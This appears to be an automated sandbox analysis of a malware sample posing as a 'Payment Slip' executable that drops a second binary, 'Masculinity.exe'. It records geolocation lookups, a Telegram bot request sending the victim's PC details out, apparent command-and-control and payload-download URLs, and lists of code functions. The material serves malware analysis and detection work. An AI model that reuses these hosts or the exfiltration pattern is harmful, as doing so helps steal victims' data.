Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.privateemail.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:06:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/8
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3290148759.0000000023700000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.privateemail.com
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBcq
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20a
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002101E000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000021019000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment Slip.exe, Masculinity.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020ED8000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBcq
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3285985149.000000001FE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Payment Slip.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Payment Slip.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Masculinity.exe

Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		7_2_00403358

Detected potential crypto function

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_042AEAD8	2_2_042AEAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_042AF3A8	2_2_042AF3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_042AE790	2_2_042AE790
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00404B0E	7_2_00404B0E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0040653D	7_2_0040653D
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015C19B	7_2_0015C19B
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015D2CD	7_2_0015D2CD
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00155362	7_2_00155362
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015C468	7_2_0015C468
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015D599	7_2_0015D599
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015C738	7_2_0015C738
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_001569A0	7_2_001569A0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_001529E0	7_2_001529E0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015CA08	7_2_0015CA08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015EC18	7_2_0015EC18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00159DE0	7_2_00159DE0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00156FC8	7_2_00156FC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015CFF8	7_2_0015CFF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015F804	7_2_0015F804
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015EC0C	7_2_0015EC0C
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_0015FC50	7_2_0015FC50
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_00153E09	7_2_00153E09
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A69590	7_2_04A69590
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A62970	7_2_04A62970
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A69E80	7_2_04A69E80
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A62288	7_2_04A62288
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A65290	7_2_04A65290
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6FA78	7_2_04A6FA78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A61BA8	7_2_04A61BA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A60B30	7_2_04A60B30
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6CF08	7_2_04A6CF08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E4B1	7_2_04A6E4B1
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E4BF	7_2_04A6E4BF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E4C0	7_2_04A6E4C0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A60007	7_2_04A60007
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6DC01	7_2_04A6DC01
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6DC10	7_2_04A6DC10
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E067	7_2_04A6E067
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E068	7_2_04A6E068
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A60040	7_2_04A60040
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E059	7_2_04A6E059
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6F1B9	7_2_04A6F1B9
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A68DF9	7_2_04A68DF9
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6F1C8	7_2_04A6F1C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E908	7_2_04A6E908
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E917	7_2_04A6E917
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6E918	7_2_04A6E918
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6ED70	7_2_04A6ED70
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A65287	7_2_04A65287
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6F620	7_2_04A6F620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A68E08	7_2_04A68E08
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A62278	7_2_04A62278
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A697B0	7_2_04A697B0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6D7B8	7_2_04A6D7B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A61B97	7_2_04A61B97
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A60B20	7_2_04A60B20
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A6D360	7_2_04A6D360
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A98FB0	7_2_04A98FB0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A981D0	7_2_04A981D0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A97B78	7_2_04A97B78
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A91EA8	7_2_04A91EA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9FCA8	7_2_04A9FCA8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A91EA7	7_2_04A91EA7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9DCA7	7_2_04A9DCA7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A938B8	7_2_04A938B8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9DCB8	7_2_04A9DCB8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9BCB7	7_2_04A9BCB7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A96488	7_2_04A96488
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A90498	7_2_04A90498
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A91E98	7_2_04A91E98
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9EEE7	7_2_04A9EEE7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9EEF8	7_2_04A9EEF8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A922FF	7_2_04A922FF
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A908F0	7_2_04A908F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A922F0	7_2_04A922F0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9CEF7	7_2_04A9CEF7
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A972C8	7_2_04A972C8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9BCC8	7_2_04A9BCC8
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A972CA	7_2_04A972CA
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A94ED0	7_2_04A94ED0
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9D828	7_2_04A9D828
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9B82A	7_2_04A9B82A
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A96021	7_2_04A96021
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A94620	7_2_04A94620
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A94622	7_2_04A94622
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9B838	7_2_04A9B838
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A96030	7_2_04A96030
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9F809	7_2_04A9F809
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A93008	7_2_04A93008
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A93007	7_2_04A93007
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A96A07	7_2_04A96A07
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9D819	7_2_04A9D819
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9F818	7_2_04A9F818
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A96A18	7_2_04A96A18
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A9EA68	7_2_04A9EA68
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Code function: 7_2_04A93460	7_2_04A93460
